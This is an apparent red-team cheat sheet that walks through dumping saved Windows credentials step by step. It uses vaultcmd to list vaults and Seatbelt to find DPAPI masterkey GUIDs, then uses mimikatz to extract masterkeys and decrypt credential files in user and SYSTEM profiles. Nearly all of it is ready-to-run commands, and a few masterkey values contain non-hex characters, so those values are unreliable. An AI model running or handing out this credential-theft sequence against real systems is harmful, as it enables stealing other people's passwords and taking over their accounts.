Works only when running as same user whose credentials we are dumping
C:\Users\Alex\Desktop> vaultcmd /list
C:\Users\Alex\Desktop> vaultcmd /listcreds:"<vault-name>" /all
List where the actual encrypted credentials are stored (keep note of FileName and GUID of masterkey)
The credentials are usually stored in C:\Users\<username>\AppData\Local\Microsoft\Credentials\
. We will also need the guid of the master-key used to encrypt these credentials so we can use seatbelt to get the guid of the master key.
C:\Users\Alex\Desktop> C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles
Here, find the masterkey using the guid extracted from above command. The GUID will be in between {}. Now extract the masterkey.
C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi
C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\8C33AC82H3F5DCEAB186B3B2E5B1AC7F /masterkey:9e26495a4bd40a61d5eb6e528d55ef598a398d530ecc2f5387e07605eefc6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19cd15
C:\Users\Alex\Desktop> ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\
C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65
C:\Users\Alex\Desktop> mimikatz !sekurlsa::dpapi
C:\Users\Alex\Desktop> mimikatz dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\E424EEB30498B77B4A85ECBBBCA19B65 /masterkey:32530ddd04093232f87ds5345b3bb4b758b7382ed6db73806f86238f6c3527d830f67210139579f26b0c0f039cd9a53b16b4af0a3f411edfagc593a541f8d0e2